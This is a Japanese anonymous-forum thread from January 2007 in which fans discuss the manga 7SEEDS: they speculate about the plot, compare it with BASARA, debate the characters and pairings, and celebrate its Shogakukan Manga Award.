ところでこれ、やっぱりBASARAに続いてんのかな?

379 :花と名無しさん:2007/01/07(日) 01:22:16 ID:???0
>>378
>>6

380 :花と名無しさん:2007/01/07(日) 01:57:32 ID:???0
種が存続〜っていうのがループネタだから、わざと言ったんだと思った

381 :花と名無しさん:2007/01/07(日) 09:23:15 ID:???0
>>379 百舌は要のような気はするけど、夏Bと一緒に行ったにしては、夏B達が目覚めたばかりの時、すでに、7種の世界に精通していたようだったし。
「このワニもどきは、この木の実のにおいがきらい。」とか、その他にも、いろいろ、スムーズに行動できすぎ。

まあ、サバイバル技術はもといた世界で身につけることはできるけどね。

どう考えても、目覚めてだいぶたっている感じ。百舌だけ先に目覚めたの?
夏Aの誰かだとしても、百舌の名を名乗り、花の事も知っているにしては、やはり、百舌が先に目覚めていないとありえないし。夏Aの誰かだとしたら、ほんものの百舌は、どうしたの?

BASARAの世界については、文明が崩壊して300年後の世界って、作品の中で言っているしね。いくらなんでも、無理があるよね。

382 :花と名無しさん:2007/01/07(日) 09:46:27 ID:???0
>380
私もそう思った。わざとだよね。

>381
私も、百舌の「共食い」発言から、他のメンバーと
眠った時期または目覚めた時期が違うのかな、と思ったな。

383 :花と名無しさん:2007/01/07(日) 11:10:57 ID:???0
日本の力じゃ7種5チームが限界だったってことだったら
アメリカやら大国は50種10チームとか作れてる国も
あるってことかな。

384 :花と名無しさん:2007/01/07(日) 13:22:51 ID:???0
冷凍装置を最初の考え出した国ってどこなんだろう。
やっぱり、アメリカ?

385 :花と名無しさん:2007/01/07(日) 14:07:01 ID:???0
他の星とか特殊なことをしてる国もあるんだろうか。

百舌が要先輩なら
百舌なら世界の動向とか把握してるだろうから
百舌の口から語られることがるのかなぁ

386 :花と名無しさん:2007/01/07(日) 14:58:16 ID:???0
百舌が目覚めた?何言ってんだ?
百舌は眠ってなんかいない。崩壊前からずっと起きてた。
要先輩ならそれくらいできる

387 :花と名無しさん:2007/01/08(月) 01:33:11 ID:???0
そんなエスパーなら苦労してないよ

388 :花と名無しさん:2007/01/08(月) 10:31:01 ID:nrLDtvOD0
>>383 夏のBチームを作るのだって冷凍装置が、間に合えばなんていってたから、これで、精一杯だったんだろうね。
>>385 他の国では、火星とか、月とかに移住していて、代を重ねている人たちがいたりしてね。その人たちが、迎えに来たくれたりして?


389 :花と名無しさん:2007/01/08(月) 16:08:01 ID:???0
>>388
むしろ種が目覚めた→とりあえず人間が住める状態になった
ってことで、様子を見つつ戻ってくるんじゃない?

ここでもさんざん言われてるけど、どうにかこうにか安全に暮らせるようになったところで
他の星なりシェルターで大量冷凍されてた人たちがやってくる。
つまり種たちはモルモット説

390 :花と名無しさん:2007/01/08(月) 23:45:10 ID:???0
隕石が衝突すると、いわゆる「核の冬」と呼ばれる氷河期が来ると言うのが長年の定説だったが、
最近の研究では「氷河期はそれほど長くは続かない」と言う説が有力らしい。
これは、植物が死滅したり、衝突時の地震や火災による燃焼で、温室効果ガスが増加。
最初は巻上げられた砂や塵によって、地上に太陽光が届かず、氷河期となるも、それも数年の話。
砂や塵は一緒に巻上げられた水蒸気とともに雨となって、地上に流されてしまう。
今度は、逆に極端に暑くなり、極地からも氷が消える。
結局は、植物が再生するまで、人類の生存環境は復活できない訳だが。

391 :花と名無しさん :2007/01/09(火) 10:22:05 ID:???0
地球規模で考えると、別に人間に生存してもらわなくてもいいわけだし。
未来では人間がいない前提で生態系がもうできあがっちゃってるのに、種達がいろいろ頑張って生き残り、結果人類が復活したりしたら・・・・・・。
虫とか魚とかには、えらい迷惑だよなぁ。

シェルターの出来事を読んでると、そこまでして生き延びようとしなくてもいいじゃん。みんな仲良く全滅で。
と思ってしまう。

392 :花と名無しさん:2007/01/09(火) 14:49:47 ID:???0
全滅でいいじゃん、とは思わないけれど、確かに、割って入ってきている感はあるかも。
(そういえば、要先輩が花になんか言ってなかったっけ。)


ただ、今だって、人間は、地球上にいる生物の中では、最後の方に誕生した生命なんだよね。
っていう意味では、未来で空白期間があったとは言え、人類が活動していても、
今とそんなに変わらないんじゃない、という気はする。

393 :花と名無しさん:2007/01/09(火) 15:38:50 ID:???0
種たちの他にもどこかで普通に生きのびた人たちの末裔がいるかもしれないしね。
どこかのシェルターで生き延びてきた人たちももしかしたらいるかもしれない。持ち込んだ動物、植物、(貴士が言ってた)魚の養殖等、食物連鎖がうまくいってね。
代替わりして、全員がシェルターで生まれ育った人たちになればシェルター暮らしも苦痛じゃないだろうし。
ただ、外に出る術がなくなっていて出られないだけでね。



394 :花と名無しさん:2007/01/09(火) 16:44:29 ID:???0
男と女が一人ずつ生き残れば人類の勝ちだお。

395 :花と名無しさん:2007/01/09(火) 17:07:26 ID:???0
>>394
アダムとイヴ?

396 :花と名無しさん:2007/01/09(火) 19:44:09 ID:???O
男女一組じゃ二世代目で滅びるよ
近親相姦はなぁ

397 :花と名無しさん:2007/01/09(火) 20:49:09 ID:???0
>>395
ガンパレードマーチ

>>396
そんなわけないじゃん。近親相姦の害を重く見すぎ。

398 :花と名無しさん:2007/01/10(水) 00:20:57 ID:???0
別スレでは従兄弟姉妹婚は、障害が出るとか間違った認識
植え付けてる人いたしなー。
血が近いことに対する迷信は根強いよね。

399 :398:2007/01/10(水) 00:27:20 ID:???0
あ、でも、男女一組じゃ滅びるとは思うけどね。
近親相姦がどうたらってんじゃなくて、単に出産形態と
子供の成長までに時間かかるってのが理由。

400 :花と名無しさん:2007/01/10(水) 07:14:47 ID:irATWEVQ0
血が濃すぎると遺伝子が似通っているので
あらゆることに対応出来なくなる



401 :花と名無しさん:2007/01/10(水) 07:18:38 ID:???0
試験管ベビーに関するノウハウはたっぷりあるみたいだが
簡単な装置は残せなかったのかね

402 :花と名無しさん:2007/01/10(水) 07:20:39 ID:???0
>>398
それだって、あまり何回も重なるとマズイよ。
血が濃くなることには変わりないし。
いとこ同士は法的にも許されてるし、一回限りでは
まず大丈夫だろうけど。

403 :花と名無しさん:2007/01/10(水) 07:30:49 ID:???0
>>399
おまえさんのレスから
糞の臭いがしてきた

404 :花と名無しさん:2007/01/10(水) 09:06:55 ID:???0
>>403
そりゃおまえ自身の体臭だよ。気づけてよかったね。

405 :花と名無しさん:2007/01/10(水) 09:29:11 ID:???0
>>399
つ反例:ソニー・ビーン一族
まぁ運が良ければ結構頑張れるのでは。

406 :花と名無しさん:2007/01/10(水) 14:21:31 ID:???O
秋  「七草」と書いて「ななくさ」
正月 「七種」と書いて「ななくさ」と読む
最近は正月のものも七草と書かれる習慣が定着してしまった。

昔の「七種粥」は現在の「春の七草」とは違っていた。
米・粟・キビ・ヒエ・ゴマ・小豆・蓑米(カズノコグサ)

七種は中国から伝わった。
五節句のひとつの「人日」に由来がある。

人日は新年になって初めて爪を切る日でもある。

407 :花と名無しさん:2007/01/10(水) 21:08:09 ID:???0
>>401 それに気になるのは牡丹さんたちが立ち去った後シェルターにほとんど物が残っていなかったてこと。
何ヶ月か暮らしただけで底をついてしまう程度しか蓄えられていなかったてことだよね。
立ち去る時にも、いくらかは運び出しただろうけど。
それこそ、種たち7人とガイド1人の計8人が3年くらいは暮らせるくらいの蓄えは必要だと思うけど。

408 :花と名無しさん:2007/01/10(水) 22:17:01 ID:???0
>>392
動物、というか、動いて捕食して云々する生物自体が、生命の歴史から見ればつい最近誕生した。
三十五億年〜四十億年の歴史がある生命に対して、そういう高等生物が生まれたのはたった数億年前。

409 :花と名無しさん:2007/01/11(木) 00:23:34 ID:???O
昨日本屋行ったとき7SEEDの色紙みたいなのが飾ってあったな。
早く10巻読みたい。

410 :花と名無しさん:2007/01/11(木) 00:38:56 ID:???O
7種にバサラの那智ちゃんみたいの出ないかな。死にそうでも一言かませるタイプのタフな人。
どんどん重くなるばかりでは、ちょっともったいないような気がする。でも、この世界観じゃ厳しいかなあ。

411 :花と名無しさん:2007/01/11(木) 10:43:10 ID:???0
多聞似のバンがあんな感じだから仮に那智似が登場したとしても
七種仕様になると思う。
夏Aみたいな育ち方であんな風なのは、さすが多聞似だと思うけど。

412 :花と名無しさん:2007/01/11(木) 11:49:26 ID:???0
こんなことを言うと身も蓋もないだろうけど、7人って設定は作者の都合だろ
12人とか20人とかになるともう書ききれないだろ
7人でさえ話し膨れまくって、風呂敷たためるかどうか怪しいのに

413 :花と名無しさん:2007/01/11(木) 14:04:15 ID:???0
聖書のノアの方舟の話がモチーフだからだと思うが。
方舟に乗った人間は、ノアとその家族全部で8人だったそうな。

414 :花と名無しさん:2007/01/12(金) 00:55:39 ID:???0
ちがうよ。モチーフは七人の侍だよ

415 :花と名無しさん:2007/01/12(金) 04:29:05 ID:???0
未来の話なのに何だか古風になるな
「七人の侍」

416 :花と名無しさん:2007/01/13(土) 09:10:16 ID:???0
10巻収録分て、今月分までだっけ?
やな回で引きだな…

417 :花と名無しさん:2007/01/13(土) 14:06:15 ID:???0
>>413
まあノアの箱舟だろうね、モチーフは。
滅亡生存物は多いけど、これを読んだ時には、個人的には星野之宣作品(ブルーシティーとかはるかなる朝とか)
がなんとなく思い浮かんだ。

418 :花と名無しさん:2007/01/14(日) 01:01:15 ID:???O
8人は仲間割れしにくいぎりぎりの人数だと2chのどこかで見たことあるな。

419 :花と名無しさん:2007/01/14(日) 21:12:07 ID:???0
8人揃ってて分裂してないチームが一つも無いよね。


420 :花と名無しさん:2007/01/14(日) 22:00:13 ID:???O
でも対立してるのは秋だけだよな。

421 :花と名無しさん:2007/01/14(日) 22:24:56 ID:???0
8人揃っているのは夏Bと秋だけ。
夏Bは4,3,1人と分かれて行動してるから
チーム全員揃っている所は無いわな。

422 :花と名無しさん:2007/01/14(日) 23:23:35 ID:???0
子作りのこと考えると1チーム8人って少ないのは散々既出だけど
これが一気に勢ぞろいすると40人だから書き分けしんどそう

そんでサクサクと減っていったと・・・

423 :花と名無しさん:2007/01/15(月) 01:18:13 ID:???0
百舌さんが死神の存在なのかな?
死神って皆が死にたいって思ったときに殺す役目?

424 :花と名無しさん:2007/01/15(月) 04:10:52 ID:???0
>>423
あと、繁殖の邪魔になりそうな人を消す役目とか?

425 :花と名無しさん:2007/01/15(月) 08:45:23 ID:???0
>>420 秋にしても、どこも、同じチームの人同士は信頼はしあっているよね。
よそのチームの人、例えば鷹にたいするような露骨な警戒心はないし。
同じグループでも他のグループでも見知らぬ人同士という点では同じなのにね。

426 :花と名無しさん:2007/01/15(月) 14:04:10 ID:???0
夏Aならともかく、会って1ヵ月程度の春と夏Bもそうだし。
嵐なんか通常だったら蝉丸よりも鷹に親近感持ちそうなのに
蝉丸に賛成で鷹排除だった。
それまでが平和な暮らしだったから
少しの間でも危険を共にした人間は特別になるんだろうか。

427 :花と名無しさん:2007/01/15(月) 17:09:53 ID:???0
いわゆるつり橋効果ってやつじゃない?

428 :花と名無しさん:2007/01/16(火) 00:19:11 ID:???0
まあそうだね
嵐は蝉丸とくっついちゃったんだと思う

429 :花と名無しさん:2007/01/16(火) 08:45:28 ID:???0
いや、うん、友情ね

430 :花と名無しさん:2007/01/16(火) 12:51:00 ID:???0
嵐×蝉、ナツ×鷹、花×ハルで万事上手く収まるような希ガス

431 :花と名無しさん:2007/01/16(火) 14:04:51 ID:???0
蝉×ナツが結構好きなのだが、少数派なんかな。


432 :花と名無しさん:2007/01/16(火) 15:15:30 ID:???O
結構いるでしょ。嵐がダメっぽい上に他に関わってるのが蝉しかいないから。

433 :花と名無しさん:2007/01/16(火) 15:41:11 ID:???0
ナツってかわいいのかな。
というか、夏Bの容姿って普通レベル?
それとも他チームみたいに容姿端麗?
ナツや蝉丸みたいなのってたくさんいそうだから、その中から
近眼じゃないとか遺伝子だとか、容姿端麗だとかっていう条件で
絞りこんだんかな。

434 :花と名無しさん:2007/01/16(火) 16:13:53 ID:???0
でも、(夏Aはともかく)夏B以外のチームも選りすぐりの頭脳明晰・容姿端麗な人ばかりにも見えないけれどね。
要の言うように全体の一部が優秀っていうのがいいという考えを基準にして選んだのだろうか。

435 :花と名無しさん:2007/01/16(火) 16:57:56 ID:???0
どうせ優秀なのばっかり集めたって、6:2:2の法則には逆らえないしね

436 :花と名無しさん:2007/01/16(火) 17:03:34 ID:???0
頭脳や個人スキルは一部がぬきんでたグループがあっても
容姿は皆、平均より上なんでないかな。
容姿端麗ていうのは綺麗な一人を取り合いになりにくいように
なんでしょう?やっぱし。「俺だけハズレ!かい」のないよう。

437 :花と名無しさん:2007/01/16(火) 18:50:11 ID:???0
>435 6:2:2の法則って何ですか

>436 容姿端麗っていうのは、卯浪がいうところ女は胸がでかいほうがいい的な
   「異性を惹きつける力」なんじゃ?
   綺麗な人に惹きつけられる⇒生殖行為におよびやすい⇒子孫繁栄

438 :花と名無しさん:2007/01/16(火) 19:08:12 ID:???0
人口の六割がふつうのひと。 二割ができるひと。 さらに二割が使えないひと。
『できるひと』のグループだけ分離しても、時間が経つと6:2:2の割合なる

439 :花と名無しさん:2007/01/16(火) 20:45:57 ID:???O
そういう6:2:2の法則や吊り橋効果とか、ちょっと専門的な用語はあんまり一般的ではないので、
知っている事前提で話さないでほしいと思ってしまう。

ところで今の過去話が終わってもまだ秋と春の話が続くんだよね。
ひとつの章がもう少し短ければいいのにな。
さすがに他チームが気になってくる。

440 :花と名無しさん:2007/01/16(火) 20:50:47 ID:???0
さっき全巻読み直して気付いたんだけど、
花の荷物の中にお父さんが大切にしてたナイフが含まれていたじゃん。
安居と貴士先生が話してるときに、皆同じナイフを
持っているという発言がある。
つまり、花と同じ特注のナイフを夏Aも持ってるってことだよね?
考えすぎかもしれないけど、夏Aはそれ見たら
花と貴士先生になんらかのつながりがあると思って
殺しちゃうんじゃないかなー、とか思ったり。

441 :花と名無しさん:2007/01/16(火) 20:54:40 ID:???0
超ガイシュツ

442 :花と名無しさん:2007/01/16(火) 21:35:34 ID:???0
シェルターの話が終わって、秋チームと花達のからみがあって
その後に、夏Aか夏Bのナツ・嵐・蝉の船の話が出るの
かなぁ〜ソロソロ、恐ろしいエピになりそうな夏Aお目
覚めが見たいような見たくないような複雑な気持ちだ。

443 :花と名無しさん:2007/01/17(水) 00:02:56 ID:???0
そこでまさかの海外チームが登場

444 :花と名無しさん:2007/01/17(水) 04:48:12 ID:???O
5巻まで買ったんだけど、これから感動する?

楽しいとは思うんだけど感動しなくて

445 :花と名無しさん:2007/01/17(水) 05:44:47 ID:???O
自分も今4巻(冬チームの話)まで読み終わったところです。
面白いとは思うけど、まだそこまでひきつけられる程ではないような…。
夏A?の話が出てくると変わるのかな。

446 :花と名無しさん:2007/01/17(水) 08:12:28 ID:???0
まだ感動の流れにはならないと思う。
タムさんだから最終的にスゲー感動!ってなる可能性はあるけど、
現時点ではハラハラドキドキワクワクが勝ってる感じ。
でも私は要所要所で、ああ、いいな、って思うシーンはあるよ

447 :花と名無しさん:2007/01/17(水) 08:14:18 ID:???0
夏Aも壮絶な話だけど、感動と言われるとチト違う気がするけど、まあ損はさせないと思うから読んでみて。
>>434
どっちかというと、夏Aで容姿端麗の人ばかり残ったのが不思議かも。他の組は多くの中から選べるわけだけど、
こっちは能力での勝ち残りだから。遺伝子操作でブサは出ないようにしてんのかな?

448 :花と名無しさん:2007/01/17(水) 11:04:16 ID:???0
まだまだ話の途中も途中って感じだけど面白く読めるし
お勧めしますよ。

夏Aの容姿の話
そうだよねぇ、赤ちゃんの時から美醜の判断って難しい
もんね。元になる人たちが元々綺麗な家系ってことだろうか。

449 :花と名無しさん:2007/01/17(水) 13:40:03 ID:???0
夏A選抜当時はそういう事は考えていなかったんじゃない?

450 :花と名無しさん:2007/01/17(水) 16:22:02 ID:???P
>>444-445
読んで絶対感動できるわけじゃないし
感動しなきゃいけないわけでもない
構えずにもっと気楽に読むか
あわないなーつまんないなーとおもったら
無理して読むことはないんじゃないかな

ちなみに自分は4巻で衝撃受けてこの漫画好きになった

451 :花と名無しさん:2007/01/17(水) 17:05:10 ID:???0
のばらとか結構ブサだった希ガス

452 :445:2007/01/17(水) 17:18:14 ID:???O
レスありがとう。
結局あの後、残りの巻を一気に買ってきました。
6巻途中まで読み進めたのだけど、今はバスの中なので読めずにウズウズしてます。
だんだん世界観も見えて、ハマってきた感じ。
読破後にこのスレの考察を読むのも楽しみです。早く着けバス

453 :花と名無しさん:2007/01/17(水) 18:25:44 ID:???0
自分も4巻でまず衝撃受けて、
それからはずーっとはまりっぱなしだな
吹雪と美鶴の二人が一番好きだった

454 :花と名無しさん:2007/01/17(水) 19:05:22 ID:???0
感動っていうよりは痛せつないい漫画だと思うので合わないと今後も辛いと思う
ハッピーな気持ちにはまだなれないし

455 :花と名無しさん:2007/01/17(水) 19:31:48 ID:???0
>>448
血筋は高貴でも皇太子とかサーヤみたいな顔ばかりだったらヤダなあ

456 :花と名無しさん:2007/01/17(水) 20:01:02 ID:vEqhomW90
455
それがちさちゃん

457 :花と名無しさん:2007/01/17(水) 20:04:15 ID:???0
すいません…
ageてしましました…

458 :花と名無しさん:2007/01/17(水) 20:05:18 ID:???0
すいません…ageてしましました

459 :花と名無しさん:2007/01/17(水) 20:17:29 ID:???0
おちつけ。しましまよ。

460 :花と名無しさん:2007/01/17(水) 21:32:41 ID:???0
>>456
あなたリーダーの資格ないですね

461 :花と名無しさん:2007/01/17(水) 21:36:36 ID:???0
感動というか、話のアラが見えすぎてるって感じだな
あんまり深く考えない女子高生とか女子中学生ならいいけど、
それよりもっと上の人間だと、ちょっと通用しないと思う
もう少し作者には頑張ってもらいたい

462 :花と名無しさん:2007/01/17(水) 22:11:50 ID:???0
ちさちゃんも今後何かの絡みエピがあるのかな
大臣の家系の娘ということは計画側の思惑が入った人選だよね

463 :花と名無しさん:2007/01/17(水) 23:02:28 ID:???O
>>448 (というか夏Aの容姿話)
鷭ってどうなの?
顔がしっかり見えるアップになったことあったっけ?

464 :花と名無しさん:2007/01/18(木) 01:31:15 ID:???0
あんな髪じゃ視力が悪くなって
脱落するだろうにね。

465 :花と名無しさん:2007/01/18(木) 04:11:51 ID:???0
鷭の顔希望

多門・七尾・ナギの薄め系
浅葱・揚羽の耽美系
朱里・今帰仁・角じいの濃い目系

好きなのを選ぶのだ

466 :花と名無しさん:2007/01/18(木) 04:30:39 ID:???0
>>464
どうせ卯波あたりに身体でも売ったんだろうさ

467 :花と名無しさん:2007/01/18(木) 10:34:37 ID:???0
465

濃い目系がよいなぁ〜
いつになったら出てくるのやら

468 :花と名無しさん:2007/01/18(木) 11:55:02 ID:???O
自分は薄めの顔がいいかな

469 :花と名無しさん:2007/01/18(木) 12:17:32 ID:???0
とりあえず藤子ちゃんとロマンスが見られればそれでいい>鷭

470 :花と名無しさん:2007/01/18(木) 15:33:41 ID:???0
あんな長いと未来での生活に支障が出るってんで
さわやかな短髪で出てきたらコーヒー吹きだすね。

471 :花と名無しさん:2007/01/18(木) 17:09:17 ID:???0
ちまきは金沢の大学に行ってて、ちさちゃんは実家が金沢だっていってたけど、何か接点はあったのかな。

472 :花と名無しさん:2007/01/18(木) 21:18:30 ID:???0
春のチームって、全員政府関係者の子だったりして。

473 :花と名無しさん:2007/01/18(木) 21:23:43 ID:???0
ハルが音楽一家の出だからそれはないだろう。
角又の家はお寺だし。

474 :花と名無しさん:2007/01/18(木) 23:25:03 ID:???0
そう考えると、お寺も何か政府とのつながりありそうな気がしてきた。
実は首相と仲が良いとか(音楽一家)
要音楽好きだし

475 :花と名無しさん:2007/01/19(金) 20:59:46 ID:???0
ハルが首相の名前も知らなかったというのがなければ
それも有りかもしれないが。

476 :花と名無しさん:2007/01/20(土) 12:41:05 ID:???0
政府のお偉方がこぞって我が子を入れようとしている様子はないしね。
生きのびて欲しいのが親心ではあってもその後の苦労を考えるとね。

477 :花と名無しさん:2007/01/21(日) 22:23:15 ID:???0
目覚めた時 君達は 
地獄にいるかもしれない 天国にいるかもしれないって
出たとこ勝負、一か八かという事だよね。
子供の運の強さを信じるしかないな。

478 :花と名無しさん:2007/01/21(日) 22:54:38 ID:???0
鷹と花たちが出会うまで、
夏Bと春はすごいタイムラグのある目覚めなのかもと想像してた

479 :花と名無しさん:2007/01/21(日) 23:29:38 ID:???0
>>477
確かにね。
冬チームなんて最悪じゃん。
てかわざわざ北海道に離さなくてもいいと思うんだけど

まず始めは暮らしやすそうな土地から・・・

480 :花と名無しさん:2007/01/22(月) 00:38:23 ID:???0
地球が温暖化しすぎて、暑い地域の種全滅の可能性もあるし。
どこが暮らしやすいかは、蓋を開けて見ないとわからんよ。

481 :花と名無しさん:2007/01/22(月) 11:02:25 ID:???0
>目覚めた時 君達は 
>地獄にいるかもしれない 天国にいるかもしれないって

よく考えたら、人類が滅亡した後の地球が天国なんてありえないんじゃ
人がいないから、何もかも自分たちでやらないといけないし、
人間関係の好き嫌いを言える状況でもないし…

最高もあるし、最低もある、っていう意味かな、やっぱり。

あと、マドンナ(あゆ)、もしくは、マドンナみたいな人にしてみれば、「天国」っていう意味なんだろうか…

482 :花と名無しさん:2007/01/22(月) 11:55:12 ID:???0
首相が単にカッコつけただけ

483 :花と名無しさん:2007/01/22(月) 12:36:15 ID:???0
南の島みたいのをイメージしたのでは?無人島。

484 :花と名無しさん:2007/01/22(月) 13:41:12 ID:???0
龍宮の人たちが3年で地上に帰れるような
楽観的なシミュレーションもあったんじゃないかねえ。
その場合は、種たちが解凍されても、そんな絶望的な状況でもなくない?

485 :花と名無しさん:2007/01/22(月) 21:11:34 ID:???0
最初から無駄だと思っていたら龍宮は造らなかったろうから
時間が経てば、ある程度は危険な状況ではなくなるような
シミュレーションはあったのかも。

486 :花と名無しさん:2007/01/22(月) 21:20:20 ID:???O
この作品面白そうでコミックス買おうか迷ってんだけど、雑誌で時々読む限り正直花って女の子が好きになれない。
そういう場合は読んでもあまり楽しめない?

487 :花と名無しさん:2007/01/22(月) 21:24:54 ID:???O
これってなんでシェルタの中で解凍してあげなかったんだ?
なんか記述あったっけ?

488 :花と名無しさん:2007/01/22(月) 21:32:29 ID:???0
>>486
ダブルヒロインだから、もう一方に期待してコミックス買わずに
しばらく様子をみてみたら?
もしかしたら花が好きになるかもしれないし。
コミックス読んでいないのに花が好きになれないなら
読まないほうがいいと思う。

489 :花と名無しさん:2007/01/22(月) 21:45:04 ID:???0
>>486
楽しめないと思う。縁が無かったということで、サヨウナラ。

個人的には漫喫でもブックオフでもいいから一度6巻を通しで一気に読んでもらいたい。
花が一番叩かれてた頃の話だから。それが大丈夫ならば楽しめるような気もするけど。

でも無理に嫌いなキャラがヒロインやってる漫画読まなくても漫画はいくらでもあるのだから、
自分の共感できるキャラが主役やってる漫画読んだ方が楽しいと思うよ。
ってことで、やっぱりサヨウナラ

490 :花と名無しさん:2007/01/22(月) 21:48:23 ID:???0
>>486
花大っっっ嫌いだけど他のキャラや話が好きだから買ってるよ

491 :花と名無しさん:2007/01/22(月) 21:55:39 ID:???0
>>486
コミックまで買う必要はないんじゃね

492 :花と名無しさん:2007/01/22(月) 22:04:24 ID:???0
>>486
自分はナツが死ぬほど嫌いだけど、他のチームが好きだから買ってるよ。
まあ1巻だけは買ってないんで少し不自由だけど、ナツばかりで読む気がしないから仕方が無い。
君も花の出ない巻だけ買うとかどうでしょう。

493 :花と名無しさん:2007/01/22(月) 22:07:13 ID:???0
花の露出が減ればなぁ。
たくさん出てれば好きになるもんでもない。
嵐の回想(妄想も)含めば、最初の章と冬の話以外は全部出てるし。

494 :花と名無しさん:2007/01/22(月) 22:20:34 ID:???0
自分の中では、花=更紗、夏=朱理にくっついてた姫。最後パイナッポーとくっついた子。

495 :花と名無しさん:2007/01/22(月) 22:21:51 ID:???0
>>486
>>488-492を見ると、結論としては買わない方が無難ということだろうね。

496 :花と名無しさん:2007/01/22(月) 22:34:06 ID:???0
>>494
花は見た目は更紗に似ているけど中身は違うと思う。
似ているだけに余計中身の違いが目についてしまう。
ナツは志麻みたいに彼女がいるのを知ってても
自分の気持ちを押し付けるようなことはしてしない。
おとなしい子だけど好きな相手への接し方は
玄象を愛したタラに近いと思う。

497 :花と名無しさん:2007/01/22(月) 22:49:32 ID:???O
花やナツのここさえなければ好きになれるのにって要素は何だろね。
私の場合はナツは悩まなくなった成長後待ち、花は嵐関連のモノローグが
半分以下、9巻以降の安定した精神状態を持続ってとこかな。

498 :花と名無しさん:2007/01/22(月) 22:50:08 ID:???0
>>494
十分も花=更紗。だからどうしても花視点で物語を見てしまうからか、
花は嫌いじゃないというか好きだな。嵐も鷹も安居も好きだけど。

499 :花と名無しさん:2007/01/22(月) 22:59:43 ID:???0
>>496
悩まないナツなんてナツじゃない!
うじうじ悩みながらも少しずつ強くなっていくところがいい〜
そんな私はナツも好きだし花も好き派。

500 :花と名無しさん:2007/01/22(月) 23:01:40 ID:???0
>>496
確かに花が更紗の立場だったら、朱理が好きだと自覚した時点で
何もかも放り投げて朱理の所へ走っていきそうだ。
恋人至上主義だし。
篠山遺跡の戦いみたいな事は出来ないだろうな。

501 :花と名無しさん:2007/01/22(月) 23:10:13 ID:???0
花は更紗と似てると思うよ。
正義感が強い、行動力がある、他人思い。ひねくれちゃんのハルですら惚れたぐらいだから、
更紗のように人的魅力はあるんだと思う。でなきゃ誰も追っかけて来ないよ。
ただ耐性が足りなかった。それも今はかなり補われてるみたいだし。嵐の生存が見えてきても、
それに溺れるでもなく仲間としっかりやってる。花は更紗と質的には同じで、ただ更紗の域に
達してなかっただけ。未熟だったということ。

502 :花と名無しさん:2007/01/22(月) 23:43:46 ID:???O
>>499
しかしその少しずつの成長さえ今はストップしてる状態なんだよね(;´Д`)
少なくとも自分のことで悩まなくなるナツは早く見たいなあ。

503 :花と名無しさん:2007/01/23(火) 00:20:55 ID:???0
ひきこもりキャラのナツがそんなに早くシッカリするのも違和感あるし、当分は
ウジウジちゃんのグルグル状態で、ゆっくり成長してゆく所を見守っていたいなぁ。

登場人物が多い分、各キャラ個性にそった成長を丁寧に書いていってほしい。
私はちさちゃんや藤子や姐さんももっと見たい派なんでナツの軟弱はあんま
し気になんない、ナツオンリーで話が進むなら今のナツでずっといかれると
確かにキツイんだがw。

504 :花と名無しさん:2007/01/23(火) 00:37:49 ID:???0
早く格闘トーナメントやってくれよ
そしたら人気出るよ

505 :花と名無しさん :2007/01/23(火) 00:51:08 ID:???0
>487
種たちは、シェルター非難組が駄目だった時用の保険要員だからじゃないの?
リスクは分散しなくちゃね。


506 :486:2007/01/23(火) 02:34:53 ID:???O
>>488-492 >>495dです。
では、とりあえず様子見てみます。完結したら一気読みしようかな

507 :花と名無しさん:2007/01/23(火) 05:11:37 ID:???0
多少嫌いなタイプの主役が中心にいたとしても、人類滅亡とそれに伴う
悲喜こもごもの物語を楽しめるには違いないと思う。
花は主役とは言っても現状では狂言回しのような位置にいるにすぎず、
嵐と花の恋愛はそれほど重要なテーマでもないし。
むしろ、花の父である貴史の言動のブレの方がはるかに気になる。
先は楽しみな漫画なんだが、アレでけっこう冷めた。

太古の花とゆめで和田慎二等の男性漫画家が描いていた
戦闘系少女漫画が好きな人にはマジお勧め>7種


508 :花と名無しさん:2007/01/23(火) 07:47:44 ID:???0
第52回小学館漫画賞 少女向け部門 受賞オメ
http://www.shogakukan.co.jp/mangasho/

509 :花と名無しさん:2007/01/23(火) 07:57:31 ID:???0
>>503
ナツはウジウジは個性としても、恋愛至上主義がなあ。そっちには積極的だし。
行くつもりは無かったのに嵐が行くとなると付いて行くし、「名前を呼んでください」とか
どこの学園ラブコメなんですか、コノヤロウって感じ。
たぶん、花の頭の中で嵐が占める割合よりも、ナツのそれの方がはるかに高いんじゃないかな。
しかも10年近い付き合いの花嵐と違ってナツは単なる一目惚れだし。

510 :花と名無しさん:2007/01/23(火) 09:02:04 ID:???O
>たぶん、花の頭の中で嵐が占める割合よりも、ナツのそれの方がはるかに高いんじゃないかな。
それだけは同意できないな。
ナツが一番考えてるのは自分の欠点だし、少なくとも6巻までは花の頭の中は嵐一色だった。

511 :花と名無しさん:2007/01/23(火) 09:05:20 ID:SUeLgu6iO
>>508
さっき新聞に載っててびっくりした。
田村さんおめでd!
いつか受賞するだろうとは思ってたけど、意外と早かったなあ。
やっぱり夏A話で盛り上がったからか。
これで注目度が上がれば嬉しいな。

512 :花と名無しさん:2007/01/23(火) 10:02:30 ID:???0
受賞は38回以来二度目? すごいなあ。

513 :花と名無しさん:2007/01/23(火) 11:37:17 ID:???O
>>505
なる


と思いかけたけど、シェルタにも避難した人間がいたとなると
種組みがシェルタに行った時に悲惨なことになりそう
既に食糧その他必需品がないor死体ゴロゴロ

514 :花と名無しさん:2007/01/23(火) 13:30:59 ID:???0
>>509
ナツが恋愛至上主義とは思えないんだが。
あの時点で一人で関東目指そうとするような性格ではないし、
自分から行動を起こそうという発想もないだろうし。
名前の件だって最初嵐が自分の事を名前で言うように言った時、
ナツも「私も」と言えなかったのがようやく言えるようになったという訳で
実際あの三人の中で嵐のナツへの呼び方だけ苗字なもの妙だったし。

515 :花と名無しさん:2007/01/23(火) 14:55:08 ID:???0
>>510
ナツって自己嫌悪の塊だ。
だから外交辞令でもなく自分を褒めてくれた嵐に心惹かれたんだろう。
誰に迷惑を掛けるでもなく、人を好きになる事で成長するならいいと思う。
自分に自信が持てるようになったナツを見てみたい。
花も昔から友達がいないような事を言ってたのに
あんなに自分に自信があるのは
自分を肯定してくれる恋人の存在が大きいと思うし。
それと花は両親に愛されていないと思っていたようだけど、
嵐にその分の愛情も求めているというのはないのかな、と感じたりする。

516 :花と名無しさん:2007/01/24(水) 07:57:17 ID:???0
>>508
これを貰うと、アニメ化へのパスポートだよね。
まあ今はまだ中途半端なところなんで無理だけど、2、3年後にはされるかも。楽しみ。

517 :花と名無しさん:2007/01/24(水) 08:56:53 ID:???O
田村さんの絵はアニメには合わない気がするから、アニメよりはドラマ化や映画化の方がいいな。
今なら漫画原作ドラマ化がブームだし、アメリカドラマのLOSTとかも人気だから実現してもおかしくないかも。
